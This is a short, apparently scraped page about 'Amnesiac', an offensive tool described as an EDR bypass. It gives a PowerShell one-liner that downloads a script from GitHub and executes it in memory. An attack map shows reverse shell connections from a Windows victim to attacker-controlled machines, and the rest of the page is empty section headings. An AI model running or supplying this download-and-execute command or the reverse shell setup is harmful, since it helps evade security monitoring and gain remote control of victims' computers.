Amnesiac - EDR Bypass
Introduction
Load and Run
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');AmnesiacAttack Map
Windows Victim Machine --> Kali Linux (Attacker's Machine)
[Reverse Shell Connection]
Kali Linux (Attacker's Machine) --> Windows Attack Machine (Amnesiac Server)
[Generate Listener Payload]
Windows Victim Machine --> Windows Attack Machine (Amnesiac Server)
[New Reverse Shell Connection]Attack Scenario
REFERENCES
Last updated